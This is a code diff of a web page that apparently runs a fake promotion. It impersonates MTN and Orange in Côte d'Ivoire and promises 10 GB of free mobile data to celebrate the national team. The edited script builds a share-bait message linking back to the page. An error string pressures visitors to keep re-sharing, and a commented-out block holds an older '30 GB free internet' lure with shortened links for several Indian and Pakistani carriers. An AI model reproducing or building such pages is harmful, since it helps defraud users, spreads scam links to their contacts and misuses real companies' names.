--- a/afconmtnfr.html
+++ b/afconmtnfr.html
@@ -44,7 +44,7 @@
         <link rel="shortcut icon" type="image/png" href="ii.jpeg" />
         <meta name="og:title" content="MTN et Orange célèbrent les éléphants de Côte d'Ivoire" />
         <meta property="og:description" content="MTN et Orange célèbrent les éléphants de la Côte d'Ivoire en récompensant tout le monde avec 10 Go de données gratuites" />
-        <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqNQrpqi8cELWRBxYJQzkrBF2CK5Jth2nrNuWmvV1z7MFKm1G_CEjLdqS03STUkWW1bdR19-2wdCRz4fvJBeCdd5Ht5dK9h9tFnXC6JAb1d3-y-Gq1AZc_MlUeVkY9Uf2EVJL9ivVETIfLbQvLSF4BYlZjxRNfaQ3xHkWK4IlXLf48ZiMZIiPFrENDxuCK/s320/92C21AA4-491D-41C6-92F6-668DA1D15B96.jpeg" />
+        <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTsNkP7lr_hB3EqLmkvV35eRtjBpDjClXX6P2k5kqlzvkN8Aren_X-KYqpAe3o061IdLSzqGlQ8qNlfbeVLskgEyMMnLoie7oW7nVrAKhckEvUM9nDauQI_LD4NA0O62FyYHEPGxpRfc8HI8rWd4YE-ArJiXuStfo4vmyEGREIszY-FUkrmYEA6HIIKMw_/s320/939662F2-52F1-46C0-A7D6-27CF7B065593.jpeg" />
         <meta property="og:type" content="website" />
     <meta property="og:updated_time" content="1440432930" />
     <link rel="me" href="https://www.blogger.com/profile/13809910274301822692" />
@@ -74,7 +74,7 @@
   
    
   
-                    <center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr8MMMo1VNATEMFUAdSYKWAms7HO0_pCObi3hgMm-lnViVuU-x9VjjK53OC6u3iOozeopg7ItRvpoCKS3afNGejJGdgv8yZpw5B-IDuZUGHg7anZDMY2yxDCM1f15HcgpQQOebjqn6PGLaDCjIkoOIibmqSUAqgcALZe6YXFE8R2i2COmG5ht7MQC19GNP/s1080/6622C0DA-47BC-49E7-8DC0-FCABE5640E0C.jpeg" alt="Free-Data" style="width: 100%;"></center>
+                    <center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTsNkP7lr_hB3EqLmkvV35eRtjBpDjClXX6P2k5kqlzvkN8Aren_X-KYqpAe3o061IdLSzqGlQ8qNlfbeVLskgEyMMnLoie7oW7nVrAKhckEvUM9nDauQI_LD4NA0O62FyYHEPGxpRfc8HI8rWd4YE-ArJiXuStfo4vmyEGREIszY-FUkrmYEA6HIIKMw_/s1080/939662F2-52F1-46C0-A7D6-27CF7B065593.jpeg" alt="Free-Data" style="width: 100%;"></center>
   
                        <marquee class="horizontal_marque" direction="left"> 10 Go de data gratuits à tous les Ivoiriens</marquee> <div class="A">
   <font color="black "> Jusqu'à aujourd'hui</font><b></br>
@@ -347,7 +347,7 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
     <script>
-        var text1 = "*MTN célèbre les éléphants de Côte d'Ivoire*%0A%0AMTN Côte d'Ivoire célèbre les éléphants de Côte d'Ivoire en offrant 10 Go de données gratuites à tous les Ivoiriens%0A%0AOBTENEZ LE VÔTRE ICI👇%0Ahttps://damba-fest.org/afconmtnfr",
+        var text1 = "*Félicitations aux éléphants de Côte d'Ivoire*%0A%0A MTN et Orange célèbrent les éléphants de la Côte d'Ivoire en récompensant tout le monde avec 10 Go de données gratuites%0A%0AOBTENEZ LE VÔTRE ICI👇%0Ahttps://damba-fest.org/afconmtnfr",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
